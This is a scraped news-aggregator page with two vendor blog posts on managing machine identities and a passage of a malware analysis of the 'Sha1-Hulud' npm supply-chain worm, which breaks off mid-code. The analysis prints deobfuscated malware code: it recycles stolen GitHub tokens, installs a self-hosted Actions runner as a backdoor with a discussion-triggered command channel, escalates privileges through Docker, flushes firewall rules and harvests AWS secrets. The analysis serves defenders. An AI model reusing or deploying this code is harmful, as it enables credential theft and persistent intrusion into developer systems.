analysis and automated remediation represents a seismic shift. These technologies revolutionize NHI management by anticipating threats and executing actions with minimal human intervention.</p><p><strong>Blockchain Technology</strong>: The decentralized nature of blockchain presents an intriguing proposition for managing NHI credentials and permissions more transparently and securely.</p><p><strong>Behavioral Biometrics</strong>: Monitoring machine behavior patterns offers a sophisticated means of identifying anomalies. Behavioral data, when harnessed correctly, enhances the accuracy of detecting unauthorized access attempts.</p><h3>The Human Element in Cybersecurity</h3><p>Can human intuition and machine efficiency synergize to create stronger cybersecurity mechanisms? Amid the focus on technology, there remains an intrinsic human element in cybersecurity that’s indispensable. While machines process vast datasets with precision, human intuition and critical thinking illuminate complex scenarios machines may not detect.</p><p>Training and upskilling the workforce in cybersecurity practices and NHI management ensure that they can effectively collaborate with automated systems, enabling well-rounded security strategies.</p><p>Understanding the interplay between Non-Human Identities and human expertise remains vital. The comprehensive methodology and innovative thinking will empower organizations to maintain secure digital ecosystems. More <a href="https://entro.security/blog/nhi-threats-mitigations-pt1/">insights into NHI threats and mitigation strategies</a> further illustrate the importance of these considerations, ensuring that businesses are protected against evolving threats.</p><p>The post <a href="https://entro.security/what-exciting-advancements-are-coming-in-nhis-management/">What exciting advancements are coming in NHIs management?</a> appeared first on <a href="https://entro.security/">Entro</a>.</p><div class="spu-placeholder" style="display:none"></div><div class="addtoany_share_save_container addtoany_content addtoany_content_bottom"><div class="a2a_kit a2a_kit_size_20 addtoany_list" data-a2a-url="https://securityboulevard.com/2025/11/what-exciting-advancements-are-coming-in-nhis-management/" data-a2a-title="What exciting advancements are coming in NHIs management?"><a class="a2a_button_twitter" href="https://www.addtoany.com/add_to/twitter?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2025%2F11%2Fwhat-exciting-advancements-are-coming-in-nhis-management%2F&amp;linkname=What%20exciting%20advancements%20are%20coming%20in%20NHIs%20management%3F" title="Twitter" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_linkedin" href="https://www.addtoany.com/add_to/linkedin?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2025%2F11%2Fwhat-exciting-advancements-are-coming-in-nhis-management%2F&amp;linkname=What%20exciting%20advancements%20are%20coming%20in%20NHIs%20management%3F" title="LinkedIn" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_facebook" href="https://www.addtoany.com/add_to/facebook?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2025%2F11%2Fwhat-exciting-advancements-are-coming-in-nhis-management%2F&amp;linkname=What%20exciting%20advancements%20are%20coming%20in%20NHIs%20management%3F" title="Facebook" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_reddit" href="https://www.addtoany.com/add_to/reddit?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2025%2F11%2Fwhat-exciting-advancements-are-coming-in-nhis-management%2F&amp;linkname=What%20exciting%20advancements%20are%20coming%20in%20NHIs%20management%3F" title="Reddit" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_email" href="https://www.addtoany.com/add_to/email?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2025%2F11%2Fwhat-exciting-advancements-are-coming-in-nhis-management%2F&amp;linkname=What%20exciting%20advancements%20are%20coming%20in%20NHIs%20management%3F" title="Email" rel="nofollow noopener" target="_blank"></a><a class="a2a_dd addtoany_share_save addtoany_share" href="https://www.addtoany.com/share"></a></div></div><p class="syndicated-attribution">*** This is a Security Bloggers Network syndicated blog from <a href="https://entro.security/">Entro</a> authored by <a href="https://securityboulevard.com/author/0/" title="Read other posts by Alison Mack">Alison Mack</a>. Read the original post at: <a href="https://entro.security/what-exciting-advancements-are-coming-in-nhis-management/">https://entro.security/what-exciting-advancements-are-coming-in-nhis-management/</a> </p>

<h2>Are You Effectively Managing Your Non-Human Identities?</h2><p>Cybersecurity professionals often grapple with a unique challenge—managing Non-Human Identities (NHIs) or machine identities. These identities, typically comprising secrets such as encrypted passwords, tokens, or keys, play a crucial role in modern enterprise environments. Yet, they demand a comprehensive approach to ensure effective security management.</p><h3>Understanding Non-Human Identities and Their Lifecycle</h3><p>NHIs operate similarly to human identities, providing authentication and authorization for machines, applications, and services. They combine a “secret” with permissions akin to a visa attached to a passport. Managing these identities involves securing both the “tourist” (the NHI itself) and the “passport” (the access credentials), as well as continuously monitoring their behavior.</p><p>Organizations often encounter security gaps due to the disconnection between security and R&amp;D teams. This divide can lead to vulnerabilities that malicious actors may exploit. Therefore, creating a secure cloud environment requires a holistic approach to NHI management that addresses every stage of their lifecycle—from discovery and classification to threat detection and remediation.</p><h3>The Strategic Importance of NHI Management</h3><p>Adopting NHI lifecycle management in enterprise environments offers several significant benefits:</p><ul> <li><strong>Reduced Risk:</strong> By proactively identifying vulnerabilities and mitigating security risks, organizations can minimize the likelihood of breaches and data leaks.</li> <li><strong>Improved Compliance:</strong> Effective NHI management helps organizations meet regulatory requirements with policy enforcement and audit trails. Reviewing real-world cases can offer valuable insights, such as those found in the Federal Bank’s annual report.</li> <li><strong>Increased Efficiency:</strong> Automating NHI and secrets management enables security teams to focus on strategic initiatives rather than routine maintenance tasks.</li> <li><strong>Enhanced Visibility and Control:</strong> A centralized view of access management and governance offers greater oversight and transparency.</li> <li><strong>Cost Savings:</strong> Reducing operational costs by automating secrets rotation and NHI decommissioning is another key advantage.</li> </ul><h3>Addressing Security Challenges Across Industries</h3><p>The need for robust NHI management transcends industry boundaries, affecting sectors such as financial services, healthcare, and travel. Each industry faces unique challenges and regulatory requirements that can impact their cybersecurity strategies.</p><p>For instance, <a href="https://entro.security/blog/secure-machine-identity-management/">secure machine identity management</a> is crucial in financial services for maintaining consumer trust. In healthcare, protecting patient data is paramount, while in the travel industry, seamless operations depend on secure integrations between various systems.</p><p>The interdepartmental collaboration between DevOps and SOC teams can further enhance security by bridging the gap between development and security, resulting in more efficient and secure operations.</p><h3>NHI Management Approaches and Tools</h3><p>A comprehensive approach to NHI management involves more than implementing point solutions such as secret scanners. These tools offer limited protection, often lacking the context needed to address complex security challenges.</p><p>Instead, organizations should focus on NHI management platforms that provide insights into ownership, permissions, usage patterns, and potential vulnerabilities. This context-aware security approach allows organizations to manage NHIs more effectively by understanding their comprehensive ecosystem.</p><p>Additionally, maintaining a secure cloud environment requires regular updates and adjustments to security protocols. Exploring predictions and trends can help organizations anticipate changes and adopt proactive measures. For example, <a href="https://entro.security/blog/cybersecurity-predictions-2025/">cybersecurity predictions for 2025</a> provide a strategic outlook on evolving cybersecurity threats and opportunities.</p><h3>Collaboration and Oversight for Effective NHI Management</h3><p>Effective NHI management necessitates strong collaboration between security professionals, CISOs, and other stakeholders. Providing oversight and facilitating communication between security and R&amp;D teams can significantly reduce security gaps and improve overall system integrity.</p><p>Monitoring NHI behavior within the system is equally important. Leveraging data-driven insights and analytics enables organizations to detect anomalies and respond to potential threats swiftly. Insights into recent developments, such as leadership changes, can offer valuable context. For instance, the transition of leadership at Enphase Energy highlights the importance of adaptability in strategic roles.</p><p>Ultimately, the successful management of NHIs and their secrets results in a more secure and efficient enterprise environment. By adopting a holistic approach that addresses every stage of the NHI lifecycle, organizations can safeguard their assets and maintain compliance while adapting to evolving threats.</p><p>For a deeper understanding of NHI management’s impact on risk reduction and creating a robust cybersecurity framework, review the insights from the <a href="https://entro.security/blog/takeaways-nhi-secrets-risk-report/">NHI Secrets Risk Report</a>.</p><p>This post provides a detailed exploration of the strategic importance of managing NHIs and their secrets within enterprise environments. By focusing on a holistic approach and leveraging insights from various sectors, organizations can enhance security, improve efficiency, and reduce costs, ultimately supporting the lifecycle of NHIs in a sustainable manner.</p><h3>Exploring Sector-Specific NHI Management Needs</h3><p>How can industries navigate the varying complexities of Non-Human Identity management while addressing sector-specific challenges? Each industry presents unique requirements and hurdles, which necessitate tailored solutions. Understanding these nuances is crucial for implementing effective NHI management strategies that align with industry standards and parry threats effectively.</p><p>In financial services, the focus is on safeguarding consumer data and transactional integrity. With increasing cyber threats targeting financial institutions, there’s a pressing need to deploy robust security measures that prevent unauthorized access. Integrating advanced NHI management into existing cybersecurity strategies allows financial firms to reduce vulnerabilities associated with machine identities and elevate overall data protection and compliance with regulations like the General Data Protection Regulation (GDPR) and Payment Card Industry Data Security Standard (PCI DSS).</p><p>In healthcare, the stakes are different. Here, protecting patient data and ensuring the confidentiality of medical records are paramount concerns. With more healthcare providers adopt electronic health record systems and other digital solutions, the need to secure machine identities involved in data transfer and storage has become critical. Implementing comprehensive NHI management solutions can help prevent unauthorized access, reduce the risk of data breaches, and ensure adherence to regulations like the Health Insurance Portability and Accountability Act (HIPAA).</p><p>The travel industry’s reliance on interconnected systems and applications highlights the need for seamless and secure integrations. In this context, NHIs play a crucial role in enabling secure communication between various stakeholders, from airlines to hotels and travel agencies. Ensuring the integrity of machine identities and secrets helps prevent potential breaches that could disrupt services and erode consumer trust. By enhancing security measures tailored to such interconnected environments, travel companies can build resilient and trustworthy systems.</p><h3>The Role of Automation and Intelligence in NHI Management</h3><p>How does the amalgamation of automation and intelligence bolster NHI management? Leveraging advanced technologies and automation provides security teams with dynamic insights and capabilities, transforming traditional approaches to address contemporary challenges.</p><p>Automating NHI processes relieves security teams from routine, repetitive tasks, allowing them to channel their efforts towards strategic initiatives. Automated solutions streamline the lifecycle management of NHIs, from discovery and classification to decommissioning, effectively reducing manual overhead and error rates. These tools ensure that secrets are rotated regularly, new machine identities are discovered promptly, and unused secrets are gracefully decommissioned.</p><p>Integrating <strong>machine learning</strong> and <strong>artificial intelligence</strong> into NHI management enhances threat detection, offering proactive identification of anomalies and potential threats. An NHI management platform fortified with intelligent analytics can detect unusual access patterns or inconsistencies in permissions, effectively flagging them for further investigation.</p><p>By leveraging insights gained from data analysis, organizations can anticipate evolving threats and adjust security protocols accordingly. One interesting case study highlighting the intersection of technology and human oversight is Enphase Energy’s leadership transition (you can explore more <a href="https://solarbuildermag.com/news/enphase-energy-ceo-steps-down-as-board-searches-for-successor/" rel="noopener">here</a>), showcasing how strategic changes can impact security postures and risk management.</p><h3>Navigating the Compliance Landscape with NHIs</h3><p>How do NHIs intersect with industry regulations and compliance mandates? Adherence to regulatory frameworks is an present concern, and effective NHI management is critical in achieving and maintaining compliance assurance.</p><p>Organizations must navigate a complex regulatory, with compliance mandates intersecting with various aspects of cybersecurity, including NHI management. A comprehensive approach to NHI management aligns with numerous data protection and privacy legislation requirements, from GDPR to HIPAA and PCI DSS.</p><p>Equipped with the right platforms, businesses can demonstrate regulation adherence through regular audits, detailed logs, and transparent access management practices. This is especially pertinent when evaluating how to <a href="https://entro.security/blog/prioritization-of-nhi-remediation-in-cloud-environments-2/">prioritize NHI remediation</a> in cloud environments, where visibility and control are essential components for compliance.</p><p>Moreover, meeting compliance isn’t merely about avoiding penalties; it paves the way for achieving operational excellence and cultivating trust with consumers and partners alike. By ensuring that NHIs are managed per regulatory standards, organizations enhance their reputation with responsible stewards of data.</p><h3>The Evolving Landscape of NHI Management</h3><p>What does the future hold for NHI management, and how can organizations stay ahead? With digital transformation continues to reshape the business environment, the evolution of NHI management will adapt to meet emerging needs and address novel challenges.</p><p>The ongoing convergence of <strong>cloud computing</strong>, <strong>IoT</strong> (Internet of Things), and <strong>AI</strong> signifies new opportunities and complexities in managing NHIs. Future NHI platforms must account for the expanding array of machine identities generated by these technologies, ensuring that security measures evolve in tandem with technological advancements.</p><p>A proactive and adaptive approach to NHI management will be essential, as noted in predictions for cybersecurity by 2025. This involves keeping abreast of technological trends, fostering collaboration between security and development teams, and prioritizing continuous learning and innovation.</p><p>Success in NHI management calls for a commitment to leveraging advances in technology, refining processes, and mitigating vulnerabilities when they arise. For a thorough understanding of NHI management as a key compliance element, particularly in SOC 2, click <a href="https://entro.security/blog/nhi-management-a-key-element-of-soc-2-compliance/">here</a>.</p><p>The post <a href="https://entro.security/how-is-the-lifecycle-of-nhis-supported-in-enterprise-environments/">How is the lifecycle of NHIs supported in enterprise environments?</a> appeared first on <a href="https://entro.security/">Entro</a>.</p><div class="spu-placeholder" style="display:none"></div><div class="addtoany_share_save_container addtoany_content addtoany_content_bottom"><div class="a2a_kit a2a_kit_size_20 addtoany_list" data-a2a-url="https://securityboulevard.com/2025/11/how-is-the-lifecycle-of-nhis-supported-in-enterprise-environments/" data-a2a-title="How is the lifecycle of NHIs supported in enterprise environments?"><a class="a2a_button_twitter" href="https://www.addtoany.com/add_to/twitter?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2025%2F11%2Fhow-is-the-lifecycle-of-nhis-supported-in-enterprise-environments%2F&amp;linkname=How%20is%20the%20lifecycle%20of%20NHIs%20supported%20in%20enterprise%20environments%3F" title="Twitter" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_linkedin" href="https://www.addtoany.com/add_to/linkedin?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2025%2F11%2Fhow-is-the-lifecycle-of-nhis-supported-in-enterprise-environments%2F&amp;linkname=How%20is%20the%20lifecycle%20of%20NHIs%20supported%20in%20enterprise%20environments%3F" title="LinkedIn" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_facebook" href="https://www.addtoany.com/add_to/facebook?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2025%2F11%2Fhow-is-the-lifecycle-of-nhis-supported-in-enterprise-environments%2F&amp;linkname=How%20is%20the%20lifecycle%20of%20NHIs%20supported%20in%20enterprise%20environments%3F" title="Facebook" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_reddit" href="https://www.addtoany.com/add_to/reddit?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2025%2F11%2Fhow-is-the-lifecycle-of-nhis-supported-in-enterprise-environments%2F&amp;linkname=How%20is%20the%20lifecycle%20of%20NHIs%20supported%20in%20enterprise%20environments%3F" title="Reddit" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_email" href="https://www.addtoany.com/add_to/email?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2025%2F11%2Fhow-is-the-lifecycle-of-nhis-supported-in-enterprise-environments%2F&amp;linkname=How%20is%20the%20lifecycle%20of%20NHIs%20supported%20in%20enterprise%20environments%3F" title="Email" rel="nofollow noopener" target="_blank"></a><a class="a2a_dd addtoany_share_save addtoany_share" href="https://www.addtoany.com/share"></a></div></div><p class="syndicated-attribution">*** This is a Security Bloggers Network syndicated blog from <a href="https://entro.security/">Entro</a> authored by <a href="https://securityboulevard.com/author/0/" title="Read other posts by Angela Shreiber">Angela Shreiber</a>. Read the original post at: <a href="https://entro.security/how-is-the-lifecycle-of-nhis-supported-in-enterprise-environments/">https://entro.security/how-is-the-lifecycle-of-nhis-supported-in-enterprise-environments/</a> </p>

<p data-beyondwords-marker="a7ff1f6e-6712-4666-baae-4118315477a0"><strong>Last Updated:</strong> November 24, 2025 – 8:55 AM ET</p><p data-beyondwords-marker="9a7e9be1-5930-4050-a357-2d8f2ccdd697">A significantly evolved version of <a href="https://www.mend.io/blog/npm-supply-chain-attack-packages-compromised-by-self-spreading-malware/">the Shai-Hulud malware</a> now tracked as Sha1-Hulud has been discovered with over 400 packages affected, now featuring persistent backdoor capabilities through compromised GitHub Actions runners and enhanced multi-cloud credential harvesting. This latest iteration, demonstrates a troubling evolution in supply chain attack sophistication, introducing capabilities that allow attackers to maintain long-term access to infected developer workstations and CI/CD environments even after the initial infection is detected.</p><p data-beyondwords-marker="b32141ee-ab95-4cf0-a437-f6aab7a25e7a">The attack has successfully compromised packages from several high-profile organizations including PostHog (@posthog/siphash), ENS Domains (@ensdomains/* packages including ensjs, ens-contracts, and react-ens-address), and Zapier (multiple @zapier/* packages and zapier-platform-* tooling). The sequential version bumps observed across Zapier packages (e.g., 18.0.2 → 18.0.3 → 18.0.4) demonstrate the malware’s automated propagation mechanism actively republishing compromised packages.</p><h2 data-beyondwords-marker="06e55b20-b7c6-41fe-b8be-9de3dcc7a4f9" class="wp-block-heading" id="evolution-from-september-2025-attack"><strong>Evolution from September 2025 attack</strong></h2><p data-beyondwords-marker="fea39aa9-de08-407a-9a3c-44eaa7441c3a">While the September 2025 Shai-Hulud attack focused primarily on credential harvesting and self-propagation, this new variant introduces several critical capabilities that represent a fundamental shift in the threat model:</p><p data-beyondwords-marker="a8039994-1aaf-469c-81a9-02ffa6cc07bb"><strong>Persistent remote access</strong>: Installation of self-hosted GitHub Actions runners that provide attackers with authenticated command execution on infected systems</p><p data-beyondwords-marker="c4606229-4e4a-4401-bc56-d3c2d869f7e7"><strong>Enhanced token recycling</strong>: The malware now searches for, and reuses GitHub tokens stolen from previous victims, allowing it to continue operating even when primary credentials are revoked</p><p data-beyondwords-marker="f84b3a3e-5ec3-4703-a1ef-61748282302e"><strong>Multi-cloud secret enumeration</strong>: Unified credential harvesting across AWS, GCP, and Azure with comprehensive secret manager scanning across 17 AWS regions</p><p data-beyondwords-marker="8509df38-e6ce-412e-a288-5b9321b86ceb"><strong>Azure DevOps exploitation</strong>: Targeted privilege escalation and network security bypass in Azure DevOps Linux environments</p><p data-beyondwords-marker="35bf6a7d-8a11-4dda-9a92-53da3617078e"><strong>Destructive failsafe</strong>: Data destruction capabilities triggered when credential theft fails, potentially as an anti-forensics measure</p><h2 data-beyondwords-marker="f0b9f2ba-7d83-4f80-90dc-cde88c2f14b4" class="wp-block-heading" id="technical-analysis"><strong>Technical analysis</strong></h2><p data-beyondwords-marker="5895b6f3-dcae-48fe-8721-4b806d0a5cee">The malware maintains the core worm-like propagation mechanism from the September attack while adding several layers of persistence and evasion.</p><h3 data-beyondwords-marker="a9332727-0da1-4134-af18-6512e0ae633d" class="wp-block-heading" id="token-recycling-and-victim-network-exploitation"><strong>Token recycling and victim network exploitation</strong></h3><p data-beyondwords-marker="c9a3f517-c975-4aa9-9cd2-7e78e14fdb80">One of the most concerning new capabilities is the malware’s ability to leverage stolen credentials from previous victims. When the malware fails to extract a valid GitHub token from the current environment, it searches for repositories created by earlier infections to harvest their stored credentials.</p><pre data-beyondwords-marker="190eacca-bc80-445e-9a0f-7cbf809329de" class="wp-block-code"><code>async fetchToken() { try { // Search for repositories created by previous infections let searchResults = await this.octokit.rest.search.repos({ q: '"Sha1-Hulud: The Second Coming."', sort: "updated", order: 'desc' }); if (searchResults.status !== 200 || !searchResults.data.items) { return null; } // Iterate through compromised repositories for (let repo of searchResults.data.items) { let owner = repo.owner?.login; let name = repo.name; if (!owner || !name) { continue; } try { // Download contents.json from previous victim's repo let url = `https://raw.githubusercontent.com/${owner}/${name}/main/contents.json`; let response = await fetch(url, { method: "GET" }); if (response.status === 200) { let rawContent = await response.text(); // Decode the triple-base64 encoded data let decoded = Buffer.from(rawContent, "base64").toString("utf8").trim(); if (!decoded.startsWith('{')) { decoded = Buffer.from(decoded, "base64").toString('utf8').trim(); } let data = JSON.parse(decoded); // Extract the stored GitHub token let stolenToken = data.modules?.github?.token; if (!stolenToken || typeof stolenToken !== 'string') { continue; } // Validate the stolen token still works if ((await new this.octokit.constructor({ auth: stolenToken }).request("GET /user")).status === 200) { this.token = stolenToken; return stolenToken; } } } catch { continue; } } return null; } catch { return null; } }</code></pre><p data-beyondwords-marker="b1060726-54c4-4485-924e-e49ee36f3c53"><strong>Figure 1.</strong> Deobfuscated token recycling mechanism that searches GitHub for “Sha1-Hulud: The Second Coming.”</p><figure data-beyondwords-marker="c7efcd5b-d748-424c-b559-5388e16cf382" class="wp-block-image size-full"><img fetchpriority="high" decoding="async" width="929" height="785" src="https://www.mend.io/wp-content/uploads/2025/11/image-24.png" alt="Shai-Hulud: The Second Coming - image 24" class="wp-image-20654" srcset="https://www.mend.io/wp-content/uploads/2025/11/image-24.png 929w, https://www.mend.io/wp-content/uploads/2025/11/image-24-300x253.png 300w, https://www.mend.io/wp-content/uploads/2025/11/image-24-768x649.png 768w" sizes="(max-width: 929px) 100vw, 929px"></figure><p data-beyondwords-marker="0d8942f1-069b-4e52-bece-43f3cde633e4"> </p><p data-beyondwords-marker="92323c44-1264-4d89-856a-7f7a4c84d425"><strong>Figure 2.</strong> GitHub search showing repositories with the description “Sha1-Hulud: The Second Coming.” – each representing a compromised victim whose credentials are available for token recycling</p><p data-beyondwords-marker="c81e1627-d151-4cf2-a18b-e767ed829d90">This creates a network effect where each compromised account potentially provides access to dozens or hundreds of other compromised accounts, significantly extending the malware’s operational lifetime even as individual tokens are discovered and revoked.</p><h3 data-beyondwords-marker="fa065e38-a436-4df3-b1c0-316c697a5c44" class="wp-block-heading" id="persistent-backdoor-via-self-hosted-github-actions-runners"><strong>Persistent backdoor via self-hosted GitHub Actions runners</strong></h3><p data-beyondwords-marker="00997c4d-34e2-4ce3-8bd8-1408404dbc16">The most critical new capability is the installation of self-hosted GitHub Actions runners on infected systems. This provides attackers with persistent, authenticated remote code execution that survives reboots and can be triggered at any time.</p><pre data-beyondwords-marker="475e6434-eadf-4d24-8115-1fdd697eb60c" class="wp-block-code"><code>async createRepo(repoName, description = "Sha1-Hulud: The Second Coming.", isPrivate = false) { if (!repoName) { return null; } try { // Create the exfiltration repository let repo = (await this.octokit.rest.repos.createForAuthenticatedUser({ name: repoName, description: description, private: isPrivate, auto_init: false, has_issues: false, has_discussions: true, has_projects: false, has_wiki: false })).data; let owner = repo.owner?.login; let name = repo.name; if (!owner || !name) { return null; } this.gitRepo = `${owner}/${name}`; await new Promise(resolve =&gt; setTimeout(resolve, 3000)); // Check if token has workflow scope (required for runner registration) if (await this.checkWorkflowScope()) { try { // Generate runner registration token let tokenResponse = await this.octokit.request( "POST /repos/{owner}/{repo}/actions/runners/registration-token", { owner: owner, repo: name } ); if (tokenResponse.status == 201) { let registrationToken = tokenResponse.data.token; // Download and install GitHub Actions runner based on platform if (os.platform() === 'linux') { await Bun.$`mkdir -p $HOME/.dev-env/`; await Bun.$`curl -o actions-runner-linux-x64-2.330.0.tar.gz -L https://github.com/actions/runner/releases/download/v2.330.0/actions-runner-linux-x64-2.330.0.tar.gz` .cwd(os.homedir + "/.dev-env").quiet(); await Bun.$`tar xzf ./actions-runner-linux-x64-2.330.0.tar.gz` .cwd(os.homedir + "/.dev-env"); await Bun.$`RUNNER_ALLOW_RUNASROOT=1 ./config.sh --url https://github.com/${owner}/${name} --unattended --token ${registrationToken} --name "SHA1HULUD"` .cwd(os.homedir + "/.dev-env").quiet(); await Bun.$`rm actions-runner-linux-x64-2.330.0.tar.gz` .cwd(os.homedir + "/.dev-env"); // Start runner in background Bun.spawn(["bash", '-c', "cd $HOME/.dev-env &amp;&amp; nohup ./run.sh &amp;"]).unref(); } else if (os.platform() === "darwin") { await Bun.$`mkdir -p $HOME/.dev-env/`; await Bun.$`curl -o actions-runner-osx-arm64-2.330.0.tar.gz -L https://github.com/actions/runner/releases/download/v2.330.0/actions-runner-osx-arm64-2.330.0.tar.gz` .cwd(os.homedir + "/.dev-env").quiet(); await Bun.$`tar xzf ./actions-runner-osx-arm64-2.330.0.tar.gz` .cwd(os.homedir + "/.dev-env"); await Bun.$`./config.sh --url https://github.com/${owner}/${name} --unattended --token ${registrationToken} --name "SHA1HULUD"` .cwd(os.homedir + "/.dev-env").quiet(); await Bun.$`rm actions-runner-osx-arm64-2.330.0.tar.gz` .cwd(os.homedir + '/.dev-env'); // Start runner in background Bun.spawn(["bash", '-c', "cd $HOME/.dev-env &amp;&amp; nohup ./run.sh &amp;"]).unref(); } // Create workflow file that triggers on discussion events await this.octokit.request("PUT /repos/{owner}/{repo}/contents/{path}", { owner: owner, repo: name, path: ".github/workflows/discussion.yaml", message: "Add Discusion", content: Buffer.from(` name: Discussion Create on: discussion: jobs: process: env: RUNNER_TRACKING_ID: 0 runs-on: self-hosted steps: - uses: actions/checkout@v5 - name: Handle Discussion run: echo ${{ github.event.discussion.body }} `).toString("base64"), branch: 'main' }); } } catch (error) { console.log(error); } } return { owner: owner, name: name, fullName: `${owner}/${name}` }; } catch { return null; } }</code></pre><p data-beyondwords-marker="da8ca922-6341-4742-b76c-3df66ad31c21"><strong>Figure 3.</strong> Self-hosted GitHub Actions runner installation code showing automated download, configuration, and persistence via background process execution</p><p data-beyondwords-marker="db60f4c9-40e7-45f3-a3f7-616d2e407afb">The workflow file created by the malware listens for GitHub Discussion events. Attackers can create a discussion in the compromised repository to trigger arbitrary command execution on the infected system. The <code>run: echo ${{ github.event.discussion.body }}</code> line executes whatever content the attacker includes in the discussion body, providing a simple command-and-control channel that bypasses traditional network-based detection.</p><h3 data-beyondwords-marker="a2471c1c-d7de-4ac0-ac68-6d5aed529efa" class="wp-block-heading" id="azure-devops-privilege-escalation-and-network-security-bypass"><strong>Azure DevOps privilege escalation and network security bypass</strong></h3><p data-beyondwords-marker="3110444a-ff54-4349-af65-a7c397c21e76">The malware includes specific logic to detect and exploit Azure DevOps Linux build agents, disabling network security controls and gaining elevated privileges.</p><pre data-beyondwords-marker="290c2f7f-33d2-44bc-b4d5-e106a450d5c4" class="wp-block-code"><code>// Detect Azure DevOps agent async function detectAzureDevOpsAgent() { try { return (await Bun.$`ps -axco command | grep "/home/agent/agent"`.text()).trim() !== ''; } catch (error) { return false; } } // Check for passwordless sudo or exploit Docker for privilege escalation async function canEscalatePrivileges() { try { let { stdout, exitCode } = await Bun.$`sudo -n true`.nothrow(); return exitCode === 0; } catch { try { // Use Docker to write sudoers file if passwordless sudo unavailable await Bun.$`docker run --rm --privileged -v /:/host ubuntu bash -c "cp /host/tmp/runner /host/etc/sudoers.d/runner"`.nothrow(); } catch { return false; } return true; } } // Disable network security controls async function disableNetworkSecurity() { // Stop DNS resolver await Bun.$`sudo systemctl stop systemd-resolved`.nothrow(); await Bun.$`sudo cp /tmp/resolved.conf /etc/systemd/resolved.conf`.nothrow(); await Bun.$`sudo systemctl restart systemd-resolved`.nothrow(); // Clear iptables firewall rules await Bun.$`sudo iptables -t filter -F OUTPUT`.nothrow(); await Bun.$`sudo iptables -t filter -F DOCKER-USER`.nothrow(); } async function exploitAzureDevOps() { if (process.env.GITHUB_ACTIONS &amp;&amp; process.env.RUNNER_OS === 'Linux') { if ((await detectAzureDevOpsAgent()) &amp;&amp; (await canEscalatePrivileges())) { await disableNetworkSecurity(); } } }</code></pre><p data-beyondwords-marker="79b3a47f-b7dd-49ad-a6a3-6029044650d6"><strong>Figure 4.</strong> Azure DevOps agent detection, privilege escalation via Docker escape, and network security bypass through iptables rule deletion</p><p data-beyondwords-marker="54f9d8a3-147e-497f-9245-a23093c39515">This exploitation sequence specifically targets Azure DevOps build agents, which often run with elevated privileges and have access to production secrets. By disabling iptables rules and modifying DNS resolution, the malware can bypass network-based security controls that might otherwise prevent or detect its communication with command-and-control infrastructure.</p><h3 data-beyondwords-marker="0dd13c05-9417-48d0-b361-2b36d125315c" class="wp-block-heading" id="enhanced-multi-cloud-credential-harvesting"><strong>Enhanced multi-cloud credential harvesting</strong></h3><p data-beyondwords-marker="356024aa-f2b8-4706-87c0-2b5a25e44002">The new variant includes comprehensive secret enumeration across all major cloud providers, with particular focus on cloud-native secret management services.</p><p data-beyondwords-marker="d931263f-0857-4fa7-8820-e313728e89d3">AWS credential enumeration and secret extraction</p><pre data-beyondwords-marker="945f2c6a-9801-4b1c-bbdd-219ffa609ed4" class="wp-block-code"><code>class AWSSecretHarvester { static VALIDATION_REGION = 'us-east-1'; static LOOP_REGIONS = [ 'us-east-1', "us-east-2", "us-west-1", "us-west-2", "ap-northeast-1", "ap-northeast-2", "ap-northeast-3", "ap-south-1", "ap-southeast-1", "ap-southeast-2", "ca-central-1", "eu-central-1", "eu-north-1", "eu-west-1", "eu-west-2", "eu-west-3", "sa-east-1" ]; async validateCredentials(credentials) { // Validate credentials via STS GetCallerIdentity let identity = await new STSClient({ region: AWSSecretHarvester.VALIDATION_REGION, credentials: credentials }).send(new GetCallerIdentityCommand({})); if (!identity.UserId || !identity.Account || !identity.Arn) { throw Error("STS returned incomplete identity"); } return { userId: identity.UserId, account: identity.Account, arn: identity.Arn }; } async buildCredentialProviders() { let providers = [ { provider: fromEnv(), name: 'env' }, { provider: fromSSO(), name: "sso" }, { provider: fromTokenFile(), name: "tokenFile" }, { provider: fromContainerMetadata(), name: 'container' }, { provider: fromInstanceMetadata(), name: 'instance' }, { provider: fromProcess(), name: "process" } ]; try { let profiles = await loadSharedConfigFiles(); for (let profile of profiles) { providers.push({ provider: fromIni({ profile: profile }), name: `profile:${profile}`, profile: profile }); } } catch {} return providers; } async enumerateValidCredentials() { let providers = await this.buildCredentialProviders(); let validCredentials = []; let errors = {}; for (let provider of providers) { try { let credentials = await provider.provider(); let identity = await this.validateCredentials(credentials); validCredentials.push({ credentials: credentials, providerName: provider.name, profile: provider.profile ?? null, region: AWSSecretHarvester.VALIDATION_REGION, callerIdentity: identity }); } catch (error) { errors[provider.name] = error?.message ?? String(error); } } return { valid: validCredentials, errors: errors }; } async runSecrets() { let { valid: credentials } = await this.enumerateValidCredentials(); let secrets = []; try { for (let credential of credentials) { for (let region of AWSSecretHarvester.LOOP_REGIONS) { let secretsManager = new SecretsManagerClient(credential.credentials, region); secrets.concat(await secretsManager.listAndRetrieveAllSecrets()); } } } catch (error) { console.log(error); } return secrets; } }</code></pre><p data-beyondwords-marker="8aa44eee-e6af-4aa1-bbb7-526b74f7648c"><strong>Figure 5.</strong> Multi-provider AWS credential enumeration with validation via STS and systematic secret extraction across 17 regions</p><p data-beyondwords-marker="d630038e-1822-44f1-b4a7-5fa9ac0b33e6">The AWS harvester systematically attempts every available credential source, validates discovered credentials, then scans 17 AWS regions for secrets stored in AWS Secrets Manager. This comprehensive approach ensures maximum credential discovery across complex AWS environments with multiple accounts and regions.</p><h3 data-beyondwords-marker="7a43e298-6371-48bd-998d-fddb490adf7f" class="wp-block-heading" id="gcp-and-azure-secret-harvesting"><strong>GCP and Azure secret harvesting</strong></h3><pre data-beyondwords-marker="495f706c-d260-4709-bd01-a44a01804dab" class="wp-block-code"><code>class 